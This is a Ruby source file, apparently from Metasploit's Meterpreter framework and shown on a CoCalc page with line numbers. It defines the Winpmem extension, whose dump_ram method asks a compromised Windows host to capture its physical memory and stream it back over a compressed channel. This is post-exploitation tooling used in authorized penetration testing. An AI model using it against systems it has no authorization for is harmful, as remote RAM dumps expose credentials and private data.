CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
# -*- coding: binary -*-
2

3
require 'rex/post/meterpreter/extensions/winpmem/tlv'
4
require 'rex/post/meterpreter/extensions/winpmem/command_ids'
5

6
module Rex
7
module Post
8
module Meterpreter
9
module Extensions
10
module Winpmem
11
###
12
#
13
# This meterpreter extension can be used to capture remote RAM
14
#
15
###
16
class Winpmem < Extension
17
  WINPMEM_ERROR_SUCCESS = 0
18
  WINPMEM_ERROR_FAILED_LOAD_DRIVER = 1
19
  WINPMEM_ERROR_FAILED_MEMORY_GEOMETRY = 2
20
  WINPMEM_ERROR_FAILED_ALLOCATE_MEMORY = 3
21
  WINPMEM_ERROR_FAILED_METERPRETER_CHANNEL = 4
22
  WINPMEM_ERROR_UNKNOWN = 255
23

24
  def self.extension_id
25
    EXTENSION_ID_WINPMEM
26
  end
27

28
  def initialize(client)
29
    super(client, 'winpmem')
30

31
    client.register_extension_aliases(
32
      [
33
        {
34
          'name' => 'winpmem',
35
          'ext'  => self
36
        },
37
      ])
38
  end
39

40
  def dump_ram
41
    request = Packet.create_request(COMMAND_ID_WINPMEM_DUMP_RAM)
42
    response = client.send_request(request)
43
    response_code = response.get_tlv_value(TLV_TYPE_WINPMEM_ERROR_CODE)
44

45
    return 0, response_code, nil if response_code != WINPMEM_ERROR_SUCCESS
46

47
    memory_size = response.get_tlv_value(TLV_TYPE_WINPMEM_MEMORY_SIZE)
48
    channel_id = response.get_tlv_value(TLV_TYPE_CHANNEL_ID)
49

50
    raise Exception, 'We did not get a channel back!' if channel_id.nil?
51

52
    # Open the compressed Channel
53
    channel = Rex::Post::Meterpreter::Channels::Pool.new(client, channel_id, 'winpmem',
54
      CHANNEL_FLAG_SYNCHRONOUS | CHANNEL_FLAG_COMPRESS, response)
55
    return memory_size, response_code, channel
56
  end
57
end
58
end; end; end; end; end
59

60